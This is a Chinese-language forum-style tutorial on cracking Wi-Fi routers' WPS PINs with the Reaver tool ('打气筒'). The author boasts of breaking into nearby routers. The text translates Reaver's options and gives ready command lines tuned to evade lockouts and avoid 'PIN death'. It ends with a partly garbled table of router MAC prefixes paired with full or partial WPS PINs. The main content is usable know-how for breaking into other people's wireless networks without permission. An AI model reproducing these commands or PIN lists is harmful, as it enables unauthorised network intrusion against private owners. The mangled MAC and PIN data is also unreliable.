打气筒教程[1]
新手一只,苦力学习3天目前战绩颇丰。共破解5个;额、 几乎全部周边的路由
器。来这边教教新入门的群众
教程就到这里了,下面说说知道前4位PIN 码和知道8位PIN 码的用法。
下面是出现动态密码的图
后面的是测试图。
打气筒参数详解
http://www.anywlan.com/article-4040-1.html
Required Arguments:
-i, --interface= Name of the monitor-mode interface to use
网卡的监视接口,通常是mon0
-b, --bssid= BSSID of the target AP
AP的MAC 地址
Optional Arguments:
-m, --mac= MAC of the host system
指定本机MAC 地址,在AP 有MAC 过滤的时候需要使用
-e, --essid= ESSID of the target AP
路由器的ESSID ,一般不用指定
-c, --channel= Set the 802.11 channel for the interface (implies -f)
信号的频道,如果不指定会自动扫描
-o, --out-file= Send output to a log file [stdout]
标准输出到文件
-s, --session= Restore a previous session file
恢复进程文件
-C, --exec= Execute the supplied command upon successful pin recovery
pin成功后执行命令
-D, --daemonize Daemonize reaver
设置reaver 成Daemon
-a, --auto Auto detect the best advanced options for the target AP
对目标AP 自动检测高级参数
-f, --fixed Disable channel hopping
禁止频道跳转
-5, --5ghz Use 5GHz 802.11 channels
使用5G 频道
-v, --verbose Display non-critical warnings (-vv for more)
显示不重要警告信息 -vv 可以显示更多
-q, --quiet Only display critical messages
只显示关键信息
-h, --help Show help
显示帮助
Advanced Options:
-p, --pin= Use the specified 4 or 8 digit WPS pin
直接读取psk (本人测试未成功,建议用网卡自带软件获取) -d, --delay= Set the delay between pin attempts [1]
pin间延时,默认1秒,推荐设0
-l, --lock-delay= Set the time to wait if the AP locks WPS pin attempts [60]
AP锁定WPS 后等待时间
-g, --max-attempts= Quit after num pin attempts
最大pin 次数
-x, --fail-wait= Set the time to sleep after 10 unexpected failures [0]
10次意外失败后等待时间,默认0秒
-r, --recurring-delay= Sleep for y seconds every x pin attempts
每x 次pin 后等待y 秒
-t, --timeout= Set the receive timeout period [5]
收包超时,默认5秒
-T, --m57-timeout= Set the M5/M7 timeout period [0.20]
M5/M7超时,默认0.2秒
-A, --no-associate Do not associate with the AP (association must be done by another application)
不连入AP (连入过程必须有其他程序完成)
-N, --no-nacks Do not send NACK messages when out of order packets are received
不发送NACK 信息(如果一直pin 不动,可以尝试这个参数) -S, --dh-small Use small DH keys to improve crack speed
使用小DH 关键值提高速度(推荐使用)
-L, --ignore-locks Ignore locked state reported by the target AP
忽略目标AP 报告的锁定状态
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
每当收到EAP 失败包就终止WPS 进程
-n, --nack Target AP always sends a NACK [Auto]
对目标AP 总是发送NACK ,默认自动
-w, --win7 Mimic a Windows 7 registrar [False]
模拟win7注册,默认关闭
------个人心得---------------------------------------------------------
对一个ap 刚开始pin 的时候打开-vv 参数,如果顺利,就中断,然后改成-v 继续pin ,反正进度是可以保存的
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S
如果一直pin 不动,尝试加-N 参数
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S -
参数的意思
-a 自动检测目标AP 最佳配置
-v 显示信息
-S,-n 把S 改n 可能会慢一点点 但可以有效防止漏码
-x 20 当出现10次pin 尝试都无法收到数据包 休息20秒
-r 100:10 每PIN100次 休息10秒
-I 300 有的路由会有PIN 保护 PIN错多少次 起码300秒后才允许你继续PIN
如果遇到那些容易PIN 死的路由,建议大家把-S 改成-n ,后面可以加上 -t 10 -d 2 -t 10 发送nack 的收包超时 如果t 后不加数字 就是收包超时5秒
-d 2 每PIN 后等待2秒后继续PIN 下一个
漏码!去-S 加-n 参数,你会有惊喜……
pin 时最好把-S 换成-n ,mercury 路由器加-d9 -t9 否则会pin 死,
mercury 路由器加-d9 -t9 否则会pin 死 怎么加啊朋友
不会pin 死 你点reaver 以后 弹出一个框 什么-a -v -S 你把-S 换成-n 后面不变加-d9 -t9
xiaopan FTP
http://forum.anywlan.com/thread-222046-1-1.html
http://www.linuxidc.com/Linux/2010-03/24798.htm
http://blog.163.com/popfei3707@126/blog/static/[***********]71662/
http://forum.anywlan.com/thread-222046-1-1.html
不会的加我QQ 491905953 注明:你是干嘛的。。。。交流技术。。本人技术鸟一只。。不是js
38:83:45:B2 (0573
38:83:45:61 3415
38:83:45:5c:2d:e4 84441959
38:83:45:BE:04:4C 75948139
38:83:45:6d 6692
38:83:45 9548
38:83:45:65:74:da 80266419
38:83:45:A8 3803
38:83:45:46 63304374
38:83:45:72 21633485
38:83:45:3D (0798
38:83:45:4E 66294283
38:83:45:4A 2112
38:83:45:87 2890
38:83:45:95 1228
40:16:9f:E5 (00721790
40:16:9F:4D 39374295
40:16:9F:6C 69465901
40:16:9F:2A 08007131
40:16:9f:45 8781.994
40:16:9F:A2 2218
40:16:9f:21 2802
40:16:9f:29 5695
40:16:9f:71 3353
40:16:9F:E2 1706
40:16:9F * 9834
40:16:9F:F8 1331
40:16:9F:66 * 9338
40:16:9f:5C 2752
40:16:9f-D4 4730
40:16:9f:E4 8219
40:16:9F:B9:CF:4A 47344389
40:16:9F:77 * *08431004
40:16:9F:F8 * 13314989
40:16:9F:4D * 39374295 c8:3A:35:13:E0 1036
c8:3a:35:35 3496
C8:3A:35:5F 62324724
c8:3a:35:39 3492
C8:3A:35:08 5420964
C8:3A:35:21 2179
c8:3A:35:47 4664
5C:63:BF:3F (0197
5c:63:bf:56 3721
5c:63:bf:c9 1078
5c:63:bf:ee (0342
5c:63:bf:e4:a2:c8 3434
5c:63:bf:61:77:3a 88028194 5c:63:bf *0283
5c:63:bf:5a 5525
5C:63:BF:96 10018514
5C:63:BF:53 20678050
5c:63:bf:ab 4620
5c:63:bf:a4 (0123
5c:63:bf:41 1011
F4:EC :38:0D 是8363 F4:EC :38:45是9086 F4:EC :38:30: 7332 F4:EC :38:3B:0339
F4:EC :38:4B:1877
F4:EC :38:4E:5808
F4:EC :38:65:8746
F4:EC :38:6C:4264
C8:3A:35:14:7A:70 13420642
tenda 路由器:11n 的
MAC:C83A35472BB0 46642400
TPLINK 840N
MAC:5C-63-BF-41-B6-E4 PIN :10118580